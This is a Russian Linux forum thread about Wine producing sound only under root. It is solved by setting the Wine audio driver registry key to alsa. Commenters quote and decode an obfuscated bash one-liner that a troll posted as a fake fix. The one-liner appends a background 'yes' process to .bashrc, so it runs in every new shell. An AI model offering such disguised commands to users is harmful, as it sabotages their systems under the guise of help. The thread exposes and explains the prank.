LINUX.ORG.RU

Нет звука в wine у пользователя

0

1

Доброго времени суток, у меня Calculate Linux 11.12. Собрал wine-1.3.32, звук проигрывается только когда приложение запускаешь от рута. У простого пользователя,звука нет! Заметил, что когда запускаю winecfg то нет Driver Diagnostics Скрин а когда winecfg запускаю от рута Скрин все работает и звук есть!

Подскажите пожалуйста как решить проблему?!

Последнее исправление: kraz5 (всего исправлений: 1)

Запусти wine regedit
посмотри ключ hkcu-software-wine-drivers-audio что там. Попробуй выставь в alsa.

Этого anonymousа не слушай, он тебя плохому научит.
//Если уже не :)

amorpher ★★★★★
()
Ответ на: комментарий от amorpher

На столько слабы умом, чтобы не разобрать, что делает это скрипт. Это лор таких дураков выращивает? Только для bash'а же. Ответ должен быть глухим молчанием. Перезапускай эмулятор терминала.

anonymous
()

wine. Я готов поспорить, что это тот же скрипт, который появился где-то в соседней теме.

ms-dos32
()
Ответ на: комментарий от anonymous

lurkmore создается силами людей моего возраста, необразованных, неэрудированных и ограниченных, целевая аудитория та же.

ms-dos32
()

Не ставь, всё верно. После вставки «alsa» всё работает. Только ключ HKEY_CURRENT_USER...остальное как ты написал software-wine-drivers-audio.

nihil ★★★★★
()
Ответ на: комментарий от kraz5

А из под рута не запускай больше ничего на «проверить», тем более вайн. Лучше уж юзера нового создать на время (потом удалить) и проверить, если ковыряться в своих настройках не хочешь.

amorpher ★★★★★
()
Ответ на: комментарий от ms-dos32

В точности там было

echo $(echo `w | sed '{1!d; s/[0-9]//g; s/\ /1/; s/:/2/; s/:/3/; s/[.:,]//g}; s/[a-z]//g; s/1/var=/; s/2/\`yes/; s/3/\`/'`"&") >> $(ls `e 2>&1 | sed '{s/b/.b/; s/:/rc/}'` 2>/dev/null) 
А «Интересный у тебя случай» как раз этот клоун использовал.

tiandrey ★★★★★
()
Ответ на: комментарий от ms-dos32
echo `w | sed '{1!d; s/[0-9]//g; s/\ /1/; s/:/2/; s/:/3/; s/[.:,]//g}; s/[a-z]//g; s/1/var=/; s/2/\`yes/; s/3/\`/'`"&"

это просто замаскированная строка

var=`yes` &
Далее,
ls `e 2>&1 | sed '{s/b/.b/; s/:/rc/}'` 2>/dev/null
даёт .bashrc на выходе, если в текущей директории есть .bashrc. Соответственно, вся команда добавляет строчку var=`yes` & в .bashrc, и при следующем запуске баша в интерактивном режиме yes запускается в фоновом режиме.

tiandrey ★★★★★
()
Ответ на: комментарий от anonymous

Я без разбирания sed под nobody запустил. Зато тепло в комнате стало, спасибо.

ms-dos32
()

До меня ,просто, не сразу дошло что это сокращение.:-)

nihil ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.